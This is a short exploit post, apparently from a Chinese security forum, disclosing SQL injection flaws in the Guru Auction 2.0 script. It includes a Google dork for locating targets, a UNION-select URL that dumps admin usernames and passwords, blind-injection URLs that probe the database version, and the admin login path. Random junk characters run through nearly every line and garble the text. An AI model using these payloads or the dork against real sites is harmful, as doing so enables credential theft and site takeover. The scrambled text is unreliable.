Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
" Q; f6 o0 E) `( P& O( q; z
9 O2 w6 C5 q+ |" b作者 : v3n0m
_ M4 ^; X3 J% w- [应用 : Guru Auction 2.0
& ~) {) m- W, s# a1 iPrice : $49' \ M3 h3 v# C- S
Vendor : http://www.guruscript.com/
' {; U. |" a# K! n9 W, b& ZGoogle Dork : inurl:subcat.php?cate_id=2 y; Q5 `% q) E. T" x% p2 ?
1 T. P/ o! E6 W. o
SQLi p0c:9 x4 V% G/ p% _
~~~~~~~~~~% Q4 e/ V' t8 ?
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--/ e/ F$ c5 E" A! A' E
! N" t. ]6 V9 \) f
$ U4 L2 {: k' h1 q) u* u
盲注 p0c:7 x( S/ o5 l( X. m. M& E7 v; u
~~~~~~~~~~9 t. I/ p' g* P' L+ I% r6 a/ N
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true Z, U; z8 M( Z: d* e% p- \
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
8 z o* C; F8 U+ n6 h w; I7 Y! W+ w$ G3 x; K& H1 }; A
管理登录入口:" \$ c0 s/ r5 y! w& V
~~~~~~~~~~
9 a/ j8 R Z8 l! Uhttp://domain.tld/[path]/admin/
# L8 [, o* D3 Y+ d0 o$ d& U- }3 X( V& G |
发表于 2012-12-31 09:24:05
收藏
支持
反对